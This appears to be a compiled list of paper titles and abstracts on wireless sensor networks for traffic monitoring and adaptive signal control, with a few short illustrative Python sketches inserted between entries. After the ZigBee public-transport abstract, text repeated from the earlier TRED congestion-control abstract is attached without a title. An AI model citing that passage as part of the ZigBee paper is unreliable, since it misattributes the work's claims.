--- paper_title: Feasibility of deploying wireless sensor based road side solutions for Intelligent Transportation Systems paper_content: The effectiveness of Intelligent Transportation Systems depends on the accuracy and timely reliable provisioning of real time data supplied by traffic data collection mechanisms. Data collection through wireless sensor networks is a very effective approach due to their easy installation, low cost, processing capabilities, small size, flexibility, and wireless communication capabilities. WSN are used in ITS for smart parking lots, adaptive traffic light control, accident avoidance and traffic estimation etc. In this paper we propose a WSN based road side communication architecture and system that can be utilized for the intelligent control and management of vehicular traffic at road intersections. In the proposed architecture, the end nodes are carried by vehicles that communicate with road side units, which in turn send the data to the coordinator module at the intersection. We introduce a reliable and robust channel switching technique that reduces the response time, energy consumption and connectivity delay while increasing the reliability of packet delivery. We perform sensitivity analysis of the proposed system architecture by varying various communication parameters to determine optimum system configuration. The results prove the integrity and feasibility of the deployment of our proposed architecture. --- paper_title: Dissemination and Harvesting of Urban Data Using Vehicular Sensing Platforms paper_content: Recent advances in vehicular communications make it possible to realize vehicular sensor networks, i.e., collaborative environments where mobile vehicles that are equipped with sensors of different nature (from toxic detectors to still/video cameras) interwork to implement monitoring applications. In particular, there is an increasing interest in proactive urban monitoring, where vehicles continuously sense events from urban streets, autonomously process sensed data (e.g., recognizing license plates), and, possibly, route messages to vehicles in their vicinity to achieve a common goal (e.g., to allow police agents to track the movements of specified cars). This challenging environment requires novel solutions with respect to those of more-traditional wireless sensor nodes. In fact, unlike conventional sensor nodes, vehicles exhibit constrained mobility, have no strict limits on processing power and storage capabilities, and host sensors that may generate sheer amounts of data, thus making already-known solutions for sensor network data reporting inapplicable. This paper describes MobEyes, which is an effective middleware that was specifically designed for proactive urban monitoring and exploits node mobility to opportunistically diffuse sensed data summaries among neighbor vehicles and to create a low-cost index to query monitoring data. We have thoroughly validated the original MobEyes protocols and demonstrated their effectiveness in terms of indexing completeness, harvesting time, and overhead. 
In particular, this paper includes (1) analytic models for MobEyes protocol performance and their consistency with simulation-based results, (2) evaluation of performance as a function of vehicle mobility, (3) effects of concurrent exploitation of multiple harvesting agents with single/multihop communications, (4) evaluation of network overhead and overall system stability, and (5) performance validation of MobEyes in a challenging urban tracking application where the police reconstruct the movements of a suspicious driver, e.g., by specifying the license number of a car. --- paper_title: Delay-optimal data forwarding in Vehicular Sensor Networks paper_content: The vehicular sensor network (VSN) is emerging as a new solution for monitoring urban environments such as intelligent transportation systems and air pollution. One of the crucial factors that determine the service quality of urban monitoring applications is the delivery delay of sensing data packets in the VSN. In this paper, we study the problem of routing data packets with minimum delay in the VSN by exploiting 1) vehicle traffic statistics, 2) anycast routing, and 3) knowledge of future trajectories of vehicles such as busses. We first introduce a novel road network graph model that incorporates the three factors into the routing metric. We then characterize the packet delay on each edge as a function of the vehicle density, speed, and the length of the edge. Based on the network model and delay function, we formulate the packet routing problem as a Markov decision process (MDP) and develop an optimal routing policy by solving the MDP. Evaluations using real vehicle traces in a city show that our routing policy significantly improves the delay performance compared with existing routing protocols. Specifically, optimal VSN data forwarding (OVDF) yields, on average, 96% better delivery ratio and 72% less delivery delay than existing algorithms in some areas distant from destinations. --- paper_title: Traffic control system using wireless sensor network paper_content: The Real time locating system (RTLS) determines and tracks the location of assets and people. This paper presents a novel application to estimate the position and velocity of vehicle using wireless sensor network. Two Anchor nodes are used as reader along roadside and total distance between them is known. Whenever a moving vehicle with tag comes in between the common part of the operating range of two anchor nodes, exchange of information is done using Symmetric double sided two way ranging algorithm, which gives us position information. Using position information at several interval of time, velocity can be easily obtained. Position and velocity is obtained and displayed on base station. Kalman filtering is used to estimate the position and velocity from noisy measurements. Performance evaluation is done comparing vehicle position speed true values with experimental and estimated values. --- paper_title: Vehicular Traffic Monitoring Using Bluetooth Scanning Over a Wireless Sensor Network paper_content: The ubiquitous nature of Bluetooth equipped devices has made it opportunistic to scavenge information that can be repurposed for applications other than initially intended. One such opportunity is in vehicular traffic monitoring, whereby sampling of Bluetooth radios serve as proxies for vehicles and consequently for traffic density and flow. 
This paper discusses a complete data collection system developed at the University of Manitoba that utilizes a variety of wireless networking technologies and devices to collect inferred traffic data at an intersection along a major thoroughfare in an urban setting. Specifically, a wireless sensor network of slave probes was designed and implemented with the objective to collect Bluetooth device information for this purpose. To facilitate easy setup and a long battery life, a solar-powered probe design was investigated. Data from each slave probe is communicated to a master node through XBee communication, where it is stored on a secure digital (SD) memory card before being transmitted to a central server every five minutes over a global system for mobile communications (GSM) cellular network. The server parses the data received and stores it in a database. Consumer and corporate websites may then access this database to display archived data or current data in real-time to various users. --- paper_title: An Intelligent Traffic Flow Control System Based on Radio Frequency Identification and Wireless Sensor Networks paper_content: This study primarily focuses on the use of radio frequency identification (RFID) as a form of traffic flow detection, which transmits collected information related to traffic flow directly to a control system through an RS232 interface. At the same time, the sensor analyzes and judges the information using an extension algorithm designed to achieve the objective of controlling the flow of traffic. In addition, the traffic flow situation is also transmitted to a remote monitoring control system through ZigBee wireless network communication technology. The traffic flow control system developed in this study can perform remote transmission and reduce traffic accidents. And it can also effectively control traffic flow while reducing traffic delay time and maintaining the smooth flow of traffic. --- paper_title: Using DTMon to monitor transient flow traffic paper_content: We evaluate the performance of the DTMon dynamic traffic monitoring system to measure travel times and speeds in transient flow traffic caused by non-recurring congestion. DTMon uses vehicular networks and roadside infrastructure to collect data from passing vehicles. We show DTMon's ability to gather high-quality real-time traffic data such as travel time and speed. These metrics can be used to detect transitions in traffic flow (e.g., caused by congestion) especially where accurate flow rate information is not available. We evaluate the accuracy and latency of DTMon in providing traffic measurements using two different methods of message delivery. We show the advantages of using dynamically-defined measurement points for monitoring transient flow traffic. We compare DTMon with currently in-use probe-based systems (e.g., AVL) and fixed-point sensors and detectors (e.g., ILD). --- paper_title: Monitoring free flow traffic using vehicular networks paper_content: We present DTMon, a dynamic traffic monitoring system using vehicular networks, and analyze its performance in free flow (i.e., non-congested) traffic. DTMon uses roadside infrastructure to gather and report current traffic conditions to traffic management centers and equipped vehicles. We analyze how traffic characteristics such as speed, flow rate, percentage of communicating vehicles, and distance from the DTMon measurement point to the roadside infrastructure affect the amount and quality of data that can be gathered and delivered.
We evaluate five different methods of delivering data from vehicles to the roadside infrastructure, including pure vehicle-to-vehicle communication, store-and-carry, and hybrid methods. Methods that employ some amount of store-and-carry can increase the delivery rate, but also increase the message delay. We show that with just a few pieces of roadside infrastructure, DTMon can gather high-quality travel time and speed data even with a low percentage of communicating vehicles. --- paper_title: Vehicle-to-vehicle and vehicle-to-roadside multi-hop communications for vehicular sensor networks: Simulations and field trial paper_content: Using vehicles as sensors for traffic and environment monitoring is a new paradigm that opens the way to worthwhile applications. Data collected on board are usually delivered through the cellular network, with the consequent overloading risk. This paper focuses on the alternative adoption of short range vehicle-to-vehicle (V2V) and vehicle-to-roadside (V2R) communications, with particular reference to the wireless access in vehicular environment (WAVE)/IEEE802.11p technology. Specifically, we propose and validate, through simulations in a urban scenario, a simple but effective routing algorithm to forward data through V2V and V2R communications. The benefits are quantified in terms of the amount of data that can be transmitted without using cellular resources. Furthermore, we present an urban field trial, deployed to test our proposed multi-hop algorithm, through the adoption of low cost hardware and open source software. --- paper_title: A vehicle-logo location approach based on edge detection and projection paper_content: Vehicle-logo location is an essential part of vehicle-logo recognition system. In this paper, a new method of vehicle-logo location is proposed. Firstly, the approximate region of vehicle-logo is obtained through the position of vehicle-plate. Then, we judge the texture of vehicle-logo background either horizontal or vertical with the edge detection and projection approach. Finally, with the known texture, position of the vehicle-logo can be located correctly by morphological filter and projection information. Experimental results demonstrate the proposed method is effective. --- paper_title: Low Energy and Low Latency in Wireless Sensor Networks paper_content: It is widely known that in wireless sensor networks (WSN), energy efficiency is of utmost importance. As a result, a common protocol design guideline has been to trade off some performance metrics such as throughput and delay for energy. This has also gone well in line with many applications for WSN. However, there are other applications with real-time constraints, such as those involved in surveillance or control loops, for which WSN still need to be energy efficient but also need to provide better performance, particularly latency. This paper presents a WSN cross-layer design approach involving the physical, MAC, and network layers that not only preserves the energy efficiency of current alternatives but also coordinates the transfer of packets from source to destination in such a way that latency and jitter are improved considerably. Our simulations show how LEMR (Latency, Energy, MAC and Routing), the proposed protocol, outperforms the well-known TMAC and S-MAC protocols in both performance metrics. 
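Several of the abstracts above (the vehicle-to-vehicle and vehicle-to-roadside multi-hop communication work and the DTMon delivery methods) rely on greedy geographic forwarding towards a roadside unit with a store-and-carry fallback. The sketch below shows one plausible next-hop rule under that general idea; the positions, radio range and node identifiers are illustrative assumptions, and this is not the exact protocol evaluated in those papers.

import math

def dist(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])

def next_hop(my_pos, neighbours, rsu_pos, radio_range=300.0):
    """Greedy geographic forwarding: hand the packet to the in-range neighbour
    closest to the roadside unit (RSU), but only if it makes progress;
    returning None means store-and-carry (keep the packet on board)."""
    best_id, best_d = None, dist(my_pos, rsu_pos)
    for node_id, pos in neighbours.items():
        if dist(my_pos, pos) > radio_range:
            continue  # neighbour is out of radio range
        d = dist(pos, rsu_pos)
        if d < best_d:
            best_id, best_d = node_id, d
    return best_id

if __name__ == "__main__":
    rsu = (1000.0, 0.0)                      # assumed RSU position
    me = (200.0, 0.0)                        # assumed own position
    nbrs = {"v7": (450.0, 5.0), "v3": (150.0, -3.0)}
    print(next_hop(me, nbrs, rsu))           # expected: 'v7' (in range and closer to the RSU)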
--- paper_title: Using GPS Data to Gain Insight into Public Transport Travel Time Variability paper_content: Transit service reliability is an important determinant of service quality, which has been mainly studied from the perspective of passengers waiting at stops. Day-to-day variability of travel time also deteriorates service reliability, but is not a well-researched area in the literature partly due to the lack of comprehensive data sets on bus travel times. While this problem is now being addressed through the uptake of global positioning system (GPS)-based tracking systems, methodologies to analyze these data sets are limited. This paper addresses this issue by investigating day-to-day variability in public transport travel time using a GPS data set for a bus route in Melbourne, Australia. It explores the nature and shape of travel time distributions for different departure time windows at different times of the day. Factors causing travel time variability of public transport are also explored using a linear regression analysis. The results show that in narrower departure time windows, travel time distributions are best characterized by normal distributions. For wider departure time windows, peak-hour travel times follow normal distributions, while off-peak travel times follow lognormal distributions. The factors contributing to the variability of travel times are found to be land use, route length, number of traffic signals, number of bus stops, and departure delay relative to the scheduled departure time. Travel time variability is higher in the AM peak and lower in the off-peak. The impact of rainfall on travel time variability is only found significant in the AM peak. While the paper presents new methods for analyzing GPS-based data, there is much scope for expanding knowledge through wider applications to new data sets and using a wider range of explanatory variables.
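The travel-time study above fits normal and lognormal distributions to travel times grouped by departure-time window. A minimal way to reproduce that kind of comparison, assuming only a list of observed travel times per window, is to compare the maximum-likelihood fits of the two candidate distributions; the sample values below are invented and the log-likelihood comparison is a simplification of a full goodness-of-fit test.

import math
import statistics

def normal_loglik(xs):
    # Maximum-likelihood normal fit uses the mean and the population (1/n) std. dev.
    mu = statistics.fmean(xs)
    sigma = statistics.pstdev(xs)
    return sum(-0.5 * math.log(2 * math.pi * sigma ** 2) - (x - mu) ** 2 / (2 * sigma ** 2) for x in xs)

def lognormal_loglik(xs):
    # Lognormal MLE is a normal fit on the logarithms, with the change-of-variable term -log(x).
    logs = [math.log(x) for x in xs]
    mu = statistics.fmean(logs)
    sigma = statistics.pstdev(logs)
    return sum(
        -math.log(x) - 0.5 * math.log(2 * math.pi * sigma ** 2) - (math.log(x) - mu) ** 2 / (2 * sigma ** 2)
        for x in xs
    )

if __name__ == "__main__":
    # Travel times in minutes for two hypothetical departure-time windows.
    am_peak = [31.2, 33.5, 30.8, 35.1, 32.0, 34.4, 31.9, 33.0]
    off_peak = [24.0, 26.5, 25.1, 31.8, 24.6, 28.9, 25.4, 36.2]
    for label, xs in [("AM peak", am_peak), ("off-peak", off_peak)]:
        better = "normal" if normal_loglik(xs) >= lognormal_loglik(xs) else "lognormal"
        print(f"{label}: better fit = {better}")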
--- paper_title: Effective Urban Traffic Monitoring by Vehicular Sensor Networks paper_content: Traffic monitoring in urban transportation systems can be carried out based on vehicular sensor networks. Probe vehicles (PVs), such as taxis and buses, and floating cars (FCs), such as patrol cars for surveillance, can act as mobile sensors for sensing the urban traffic and send the reports to a traffic-monitoring center (TMC) for traffic estimation. In the TMC, sensing reports are aggregated to form a traffic matrix, which is used to extract traffic information. Since the sensing vehicles cannot cover all the roads all the time, the TMC needs to estimate the unsampled data in the traffic matrix. As this matrix can be approximated to be of low rank, matrix completion (MC) is an effective method to estimate the unsampled data. However, our previous analysis on the real traces of taxis in Shanghai reveals that MC methods do not work well due to the uneven samples of PVs, which is common in urban traffic. To exploit the intrinsic relationship between the unevenness of samples and traffic estimation error, we study the temporal and spatial entropies of samples and successfully define the important criterion, i.e., average entropy of the sampling process. A new sampling rule based on this relationship is proposed to improve the performance of estimation and monitoring. With the sampling rule, two new patrol algorithms are introduced to plan the paths of controllable FCs to proactively participate in traffic monitoring. By utilizing the patrol algorithms for real-data-set analysis, the estimation error reduces from 35% to about 10%, compared with the random patrol or interpolation method in traffic estimation. Both the validity of the exploited relationship and the effectiveness of the proposed patrol control algorithms are demonstrated. --- paper_title: Mobility management algorithms and applications for mobile sensor networks paper_content: Wireless sensor networks (WSNs) offer a convenient way to monitor physical environments. In the past, WSNs are all considered static to continuously collect information from the environment. Today, by introducing intentional mobility to WSNs, we can further improve the network capability on many aspects, such as automatic node deployment, flexible topology adjustment, and rapid event reaction. In this paper, we survey recent progress in mobile WSNs and compare works in this field in terms of their models and mobility management methodologies. The discussion includes three aspects. Firstly, we discuss mobility management of mobile sensors for the purposes of forming a better WSN, enhancing network coverage and connectivity, and relocating some sensors. Secondly, we introduce path-planning methods for data ferries to relay data between isolated sensors and to extend a WSN's lifetime. Finally, we review some existing platforms and discuss several interesting applications of mobile WSNs. Copyright © 2010 John Wiley & Sons, Ltd.
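The "Effective Urban Traffic Monitoring" abstract above uses the average entropy of the sampling process as the criterion linking uneven probe-vehicle coverage to estimation error. Purely as an illustration (the binning scheme and data are assumptions, and this is not the authors' exact definition), the Shannon entropy of the empirical distribution of probe reports over road-segment/time-slot bins can be computed as follows; more even coverage yields a higher entropy.

import math
from collections import Counter

def sampling_entropy(samples):
    """Shannon entropy (in bits) of the empirical distribution of probe samples
    over (road segment, time slot) bins; higher values mean more even coverage."""
    counts = Counter(samples)
    total = sum(counts.values())
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

if __name__ == "__main__":
    # Each entry is the (segment, time-slot) bin hit by one probe report; data is illustrative.
    uneven = [("s1", 0)] * 90 + [("s2", 0)] * 5 + [("s3", 0)] * 5
    even = [("s1", 0)] * 34 + [("s2", 0)] * 33 + [("s3", 0)] * 33
    print("uneven coverage entropy:", round(sampling_entropy(uneven), 3))
    print("even coverage entropy:  ", round(sampling_entropy(even), 3))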
--- paper_title: Research on Traffic Monitoring Network and Its Traffic Flow Forecast and Congestion Control Model Based on Wireless Sensor Networks paper_content: In this paper, we have made a comprehensive study about the key technologies including applying wireless sensor networks to the traffic monitoring network, its traffic flow forecast based on gray forecasting model and traffic congestion control.
According to the features that wireless sensor networks have no space constraints, flexible distribution, mobile convenience and quick reaction, we present a scheme that uses wireless sensor networks to monitor city transport vehicles and have designed a traffic monitoring system based on wireless sensor network that is applicable to all types of city environment. With the system, we can monitor the important roads that are easily blocked and find out the time changing law of traffic congestion, and then put the focus on monitoring them in order to greatly reduce the investment and achieve high efficiency. As far as the traffic flow forecasting methods concerned, we use Adaptive GM (1, 1) Model which have a real-time rolling forecast for city traffic and have a better forecast results. Because of the fewer study about the traffic congestion control in the current academia, we make a deep study about the traffic congestion control issues in this article. Learn from mature congestion control algorithm in computer network, we have designed an algorithm of traffic flow congestion control and scheduling for traffic network, which is called TRED. We have used it for real-time traffic scheduling and have opened up a new way to study and solve traffic congestion control problems. --- paper_title: Wireless sensor networks for traffic monitoring in a logistic centre paper_content: Abstract A wireless sensor network (WSN) is a net of small sensor nodes, communicating using wireless technology to collect data. It combines distributed sensing and wireless communication, integrated in a self-powered small device with limited computation and memory functions. In this research, a WSN for traffic monitoring was installed and tested in the area of a logistic platform, the freight village of Turin. The sensor network layout was designed to detect all vehicles entering and leaving the area as well as the zones to which they are relating. One peculiarity of the logistic centre installation is related to the sensors’ locations on the roadway: as it was not possible to install sensors in optimal locations, characterised by almost-constant vehicle speed, scarce lane changing, and stationary vehicle pattern, the detection system accuracy requires assessment using vehicle count and classification. After a statistical analysis of system performance under different traffic conditions, a method to analyse and correct detection data is then proposed to reach satisfactory accuracy even in atypical installations. --- paper_title: Improving emergency messages transmission delay in road monitoring based WSNs paper_content: The main wireless technology used for events sensing and data collection is wireless sensor devices. These sensors are mounted on vehicles or in the roadside to send data collected periodically or upon incident detection. In this latter case, ensuring low transmission delay from the detector sensor to WSNs gateway is a real challenge. Indeed, faster notification of the Traffic Management System (TMS) leads to more efficient reaction to the emergency situation. Thus, cars collision and human lives loss as well as road traffic jam will be mitigated. In this paper, we investigate the Medium Access Control (MAC) layer in WSNs to improve the real time data collection scheme. To this end, we propose an enhanced backoff selection scheme for IEEE 802.15.4 protocol to ensure fast transmission of the detected events on the road towards the TMS. 
The main feature of our scheme is its ability to assign a shorter waiting time for messages carrying critical information without changing the basic principle of the backoff mechanism. The obtained simulation results under various scenarios have proven the effectiveness of our scheme in terms of transmission delay reduction. --- paper_title: Intelligent Vehicle Recognition based on Wireless Sensor Network paper_content: One of the main requirements of any intelligent transportation system is to be able to identify vehicles in the traffic. This paper presents an intelligent vehicle identification system used within a complete solution for a traffic monitoring system thatusesa novelwireless sensor network architecture to monitor traffic. A novel wireless sensor network architecture to monitor traffic is proposed where a visual sensor node captures images of the traffic and sends them to the traffic control center for processing. Also, this paper compares between three main localization and recognition algorithms. To locate the vehicle logo in the traffic image a symmetry detection algorithm is used to detect the inherent symmetry in vehicle frontal images. A fine location of the logo is identified using three different methods in the region marked by the symmetry line. After locating the logo three feature sets are extracted and presented to the classifier to correctly identify the type of the vehicle. The results of the localization and recognition algorithms show the efficiency of the presented system in identifying vehicle types with a recognition rate over 90%. --- paper_title: Intelligent Traffic Light System to Prioritized Emergency Purpose Vehicles based on Wireless Sensor Network paper_content: The use of Wireless Sensor Network (WSN) has proved to be a very beneficial in the design of adaptive and dynamic traffic light intersection system that will minimize the waiting time of vehicles and also manage the traffic load at the intersection adaptively. In this paper, we propose an adaptive traffic intersection system based on Wireless Sensor Network where the traffic light of one intersection can communicate with the traffic light of the next neighboring intersections and traffic clearance will be prioritized for special vehicles with the help of sensors. General Terms: Wireless Sensor Network. --- paper_title: Design and Research on Traffic Signal of Wireless Sensor Network Based on Labview paper_content: In order to solve the increasingly serious traffic problems in the city, how to achieve effective management and control of the traffic information has become an urgent problem that should be solved in transportation of our country. This paper proposes a design on traffic signal of wireless sensor network based on LabVIEW, including traffic signal controller, GPRS wireless modem and LabVIEW interface. It adopts GPRS wireless telecommunication as the method to transport the data of traffic signal control. This method could solve the problem of high costs and the difficult problems in using wired telecommunication cable system. Traffic signal device adopts Single Chip Microcomputer to control, introduces the information collection module by using the front-end of the HMC5883L Magnetoresistive Sensor. It describes the GPRS technology and relating properties. The traffic signal monitor interface designed by LabVIEW software, and achieves the control of traffic signal. 
Keywords—GPRS; Traffic Signal; HMC5883L Magnetoresistive Sensor --- paper_title: Intelligent transportation system based on SIP/ZigBee architecture paper_content: In a heterogeneous network environment, constructing applications of a remote distributed intelligent transportation system (ITS) is faced with complex communication problems posed by online management, data acquisition and the coordination control of traffic node devices. Therefore, a framework based on SIP/ZigBee architecture is proposed. By using SIP and its extensions, a seamless convergence of the traffic measurement and control network between the Internet and short-range wireless sensor and actuator networks (WSAN) can be achieved. The application result shows that various remote communications and control operations of ITS distributed nodes can be unified and simplified. --- paper_title: Implementing Intelligent Traffic Control System for Congestion Control Ambulance Clearance and Stolen Vehicle Detection paper_content: Traffic congestion is a major problem in cities of developing countries like India. Growth in the urban population and the middle-class segment contributes to the rising number of vehicles in the cities. Congestion on roads eventually results in slow moving traffic, which increases the time of travel, and is thus notable as one of the major issues in metropolitan cities. Emergency vehicles like ambulances and fire trucks need to reach their destinations at the earliest. If they spend a lot of time in traffic jams, the lives of many people may be in danger. Here the image sequences from a camera are analyzed using various edge detection and object counting methods to obtain the most efficient technique. Then, the number of vehicles at the intersection is evaluated and traffic is efficiently managed. The traffic signal indication continuously glows green as long as the emergency vehicle is waiting at the traffic lane. After the vehicle has crossed the junction, the traffic signals automatically resume their previous pattern. This can be implemented in LABVIEW. --- paper_title: An Approach towards Traffic Management System using Density Calculation and Emergency Vehicle Alert paper_content: Nowadays many things are controlled automatically.
Everything is being controlled using mechanical or automated systems. In every field, machines are doing human work. But some areas are still controlled manually, for example traffic control, road control, and parking control. Keeping these things in mind, we are trying to develop a project to automate traffic tracking for the square. To make any project more useful and acceptable to any organization, we need to provide multiple features in a single project. Keeping these things in consideration, the proposed system combines multiple methodologies which can be used in a traffic control system. It is important to know the road traffic density in real time, especially in mega cities, for signal control and effective traffic management. In recent years, video monitoring and surveillance systems have been widely used in traffic management. Hence, traffic density estimation and vehicle classification can be achieved using video monitoring systems. In most vehicle detection methods in the literature, only the detection of vehicles in frames of the given video is emphasized. However, further analysis is needed in order to obtain the useful information for traffic management such as real time traffic density and number of vehicle types passing these roads. This paper presents emergency vehicle alert and traffic density calculation methods using IR and GPS. --- paper_title: Intelligent transportation systems for wireless sensor networks based on ZigBee paper_content: Combining the characteristics of intelligent transportation systems with wireless sensor network technology, this paper illustrates an intelligent transportation system solution based on ZigBee wireless sensor networks. Through a comprehensive analysis of three aspects (network topology, energy saving, and stability and reliability), this paper puts forward the hardware design of the sensor network node and network protocols suitable for an urban public transport system. Buses in operation can be monitored in real-time, to achieve the purpose of intelligent management. This system has a higher cost performance compared with the current GPS systems used in public transit.
Because traffic congestion control has received relatively little study in academia, we make an in-depth study of traffic congestion control issues in this article. Learning from mature congestion control algorithms in computer networks, we have designed an algorithm for traffic flow congestion control and scheduling in the traffic network, called TRED. We have used it for real-time traffic scheduling and have opened up a new way to study and solve traffic congestion control problems. --- paper_title: Adaptive Traffic Signal Flow Control Using Wireless Sensor Networks paper_content: The growth and scale of vehicle use today make traffic management a constant problem. Measures such as toll-based systems with electronic smart card recognition, advance notification of traffic status and fixed-time control signaling are considered to alleviate the traffic woes of passengers. However, a sizeable number of problems still exist due to incomplete utilization of the road systems. In this paper, an approach to make the traffic signal adaptive to the dynamic traffic flow using a wireless sensor network is proposed. The proposed approach is simulated in LabVIEW software and compared with the existing fixed-time control scheme. From the results obtained, it is observed that the proposed approach outperforms the existing approaches. --- paper_title: Intelligent traffic management with wireless sensor networks paper_content: Vehicular travel is gaining importance everywhere, particularly in large urban areas. The current technologies that support vehicular travel, such as wired sensors, inductive loops and surveillance cameras, are expensive and also incur high maintenance costs. Further, the accuracy of these devices depends on environmental conditions. Typical traditional approaches attempt to optimize traffic light control for a particular density and configuration of traffic. However, the major disadvantage of these techniques is that the dynamic behavior of traffic densities and configurations is difficult to model continuously. Traffic seems to be an adaptation problem rather than an optimization problem. This paper therefore tries to address the above issue, and hence we propose algorithms which perform adaptive traffic light control using a wireless sensor network setup. The paper aims at analyzing methods to build an intelligent system that can blend with and support some of the existing traffic control technologies and therefore reduce the average waiting time of vehicles at a junction. The proposed algorithms are adaptive to traffic flow at any intersection point of roads. Simulations of real-life traffic scenarios are conducted on a simulation platform called the Green Light District Simulator (GLD) to generate graphs of average waiting time versus cycles. The results show that the proposed method is effective for traffic control at a real road intersection. --- paper_title: A novel approach for dynamic traffic lights management based on Wireless Sensor Networks and multiple fuzzy logic controllers paper_content: Highlights: Flexible, scalable traffic lights dynamic control system for isolated intersections. Multiple parallel fuzzy controllers dynamically manage both the phase and green time. Outperforms other works in terms of vehicle waiting time and balancing between phases. Very effective under heavy traffic and when phases have unbalanced arrival rates. Lightweight and effective, implementable on COTS devices: broad practical impact expected.
This paper proposes a novel approach to dynamically manage the traffic lights cycles and phases in an isolated intersection. The target of the work is a system that, comparing with previous solutions, offers improved performance, is flexible and can be implemented on off-the-shelf components. The challenge here is to find an effective design that achieves the target while avoiding complex and computationally expensive solutions, which would not be appropriate for the problem at hand and would impair the practical applicability of the approach in real scenarios. The proposed solution is a traffic lights dynamic control system that combines an IEEE 802.15.4 Wireless Sensor Network (WSN) for real-time traffic monitoring with multiple fuzzy logic controllers, one for each phase, that work in parallel. Each fuzzy controller addresses vehicles turning movements and dynamically manages both the phase and the green time of traffic lights. The proposed system combines the advantages of the WSN, such as easy deployment and maintenance, flexibility, low cost, noninvasiveness, and scalability, with the benefits of using four parallel fuzzy controllers, i.e., better performance, fault-tolerance, and support for phase-specific management. Simulation results show that the proposed system outperforms other solutions in the literature, significantly reducing the vehicles waiting times. A proof-of-concept implementation on an off-the-shelf device proves that the proposed controller does not require powerful hardware and can be easily implemented on a low-cost device, thus paving the way for extensive usage in practice. --- paper_title: Efficient dynamic traffic control system using wireless sensor networks paper_content: This paper proposes an improved traffic control system by having dynamic time limits at the traffic signal intersections. The proposed system uses sensors to find the traffic conditions to dynamically control the traffic. Prevailing static traffic control system may block emergency vehicles such as ambulance due to traffic congestion. The proposed Efficient Dynamic Traffic Control System (EDTCS) has Traffic Control Unit (TCU), Monitor Unit (MU) and Road Side Unit (RSU). RSU contains RFID reader which reads the unique RFID code for an emergency vehicle and send it to MU. MU uses sensors such as proximity switch and RFID tags to get the count of normal and emergency vehicles respectively and sensed information is sent to TCU. TCU receives the count of normal and emergency vehicles and changes the signal dynamically by comparing the count obtained from different lanes. The proposed EDTCS saves travel time and gives a special priority to emergency vehicles like ambulance. --- paper_title: A distributed algorithm for multiple intersections adaptive traffic lights control using a wireless sensor networks paper_content: In this article, we detail and evaluate a distributed algorithm that defines the green lights sequence and duration in a multi-intersection intelligent transportation system (ITS). We expose the architecture of a wireless network of sensors deployed at intersections, which takes local decisions without the help of a central entity. 
We define an adaptive algorithm, called TAPIOCA (distribuTed and AdaPtive IntersectiOns Control Algorithm), that uses data collected by this sensor network to decide dynamically of the green light sequences, considering three objectives: (i) reducing the users average waiting time while limiting the starvation probability; (ii) selecting in priority the movements that have the best load discharge potential and (iii) synchronizing successive lights, for example to create green waves. Simulation results performed with the SUMO simulator show that TAPIOCA achieves a low average waiting time of vehicles and reacts quickly to traffic load increases, compared to other dynamic strategies and to pre-determined schedules. --- paper_title: Simulation of dynamic traffic control system based on wireless sensor network paper_content: The use of wireless sensor network in the smart traffic control systems is very beneficial and starting to be very promising in the design and implementation for such systems. It will help in saving people time and adapt the intersections traffic lights to the traffic loads from each direction. In this paper we present an intelligent traffic signals control system based on a wireless sensor network (WSN). It uses the vehicle queue length during red cycle to perform better control in the next green cycle. The main objective is to minimize the average waiting time that will reduce the queues length and do better traffic management based on the arrivals in each direction. The system also includes an approach to alert the people about the red light crossing to minimize the possibility of accidents due to red light crossing violations. The system was simulated and results are shown in the end of this paper. --- paper_title: Adaptive Traffic Light Control in Wireless Sensor Network-Based Intelligent Transportation System paper_content: We investigate the problem of adaptive traffic light control using real-time traffic information collected by a wireless sensor network (WSN). Existing studies mainly focused on determining the green light length in a fixed sequence of traffic lights. In this paper, we propose an adaptive traffic light control algorithm that adjusts both the sequence and length of traffic lights in accordance with the real time traffic detected. Our algorithm considers a number of traffic factors such as traffic volume, waiting time, vehicle density, etc., to determine green light sequence and the optimal green light length. Simulation results demonstrate that our algorithm produces much higher throughput and lower vehicle's average waiting time, compared with a fixed-time control algorithm and an actuated control algorithm. We also implement proposed algorithm on our transportation testbed, iSensNet, and the result shows that our algorithm is effective and practical. --- paper_title: Intelligent Traffic Light Flow Control System Using Wireless Sensors Networks paper_content: Vehicular traffic is continuously increasing around the world, especially in large urban areas. The resulting congestion has become a major concern to transportation specialists and decision makers. The existing methods for traffic management, surveillance and control are not adequately efficient in terms of performance, cost, maintenance, and support. In this paper, the design of a system that utilizes and efficiently manages traffic light controllers is presented. 
In particular, we present an adaptive traffic control system based on a new traffic infrastructure using a Wireless Sensor Network (WSN) and using new techniques for controlling the traffic flow sequences. These techniques are dynamically adaptive to traffic conditions at both single and multiple intersections. A WSN is used as a tool to instrument and control traffic signals on roadways, while an intelligent traffic controller is developed to control the operation of the traffic infrastructure supported by the WSN. The controller embodies the traffic system communication algorithm (TSCA) and the traffic signals time manipulation algorithm (TSTMA). Both algorithms are able to provide the system with adaptive and efficient traffic estimation, represented by the dynamic change in the traffic signals' flow sequence and traffic variation. Simulation results show the efficiency of the proposed scheme in solving traffic congestion in terms of the average waiting time and average queue length at the isolated (single) intersection, and efficient global traffic flow control on multiple intersections. A test bed was also developed and deployed for real measurements. The paper concludes with some future highlights and useful remarks. --- paper_title: Adaptive Traffic Light Control of Multiple Intersections in WSN-Based ITS paper_content: We investigate the problem of adaptive traffic light control of multiple intersections using real-time traffic data collected by a wireless sensor network (WSN). Previous studies mainly focused on optimizing the intervals of green lights in fixed sequences of traffic lights and ignored the traffic flow's characteristics and special traffic circumstances. In this paper, we propose an adaptive traffic light control scheme that adjusts the sequences of green lights in multiple intersections based on the real-time traffic data, including traffic volume, waiting time, number of stops, and vehicle density. Subsequently, the optimal green light length can be calculated from the local traffic data and the traffic condition of neighbor intersections. Simulation results demonstrate that our scheme produces much higher throughput, lower average waiting time and fewer stops, compared with three control approaches: the optimal fixed-time control, an actuated control and an adaptive control. --- paper_title: Traffic lights detection and state estimation using Hidden Markov Models paper_content: The detection of a traffic light on the road is important for the safety of a vehicle's occupants, whether in a conventional vehicle or an autonomous land vehicle. In a conventional vehicle, a system that helps the driver perceive the details of traffic signals could be critical during a delicate driving manoeuvre (e.g., crossing an intersection). Furthermore, traffic light detection by an autonomous vehicle is a special case of perception, because it drives the control actions the autonomous vehicle must take. Multiple authors have used image processing as a basis for traffic light detection. However, image processing is sensitive to the conditions under which scenes are captured, and traffic light detection suffers as a result. For this reason, this paper proposes a method that links image processing with a state estimation routine based on Hidden Markov Models 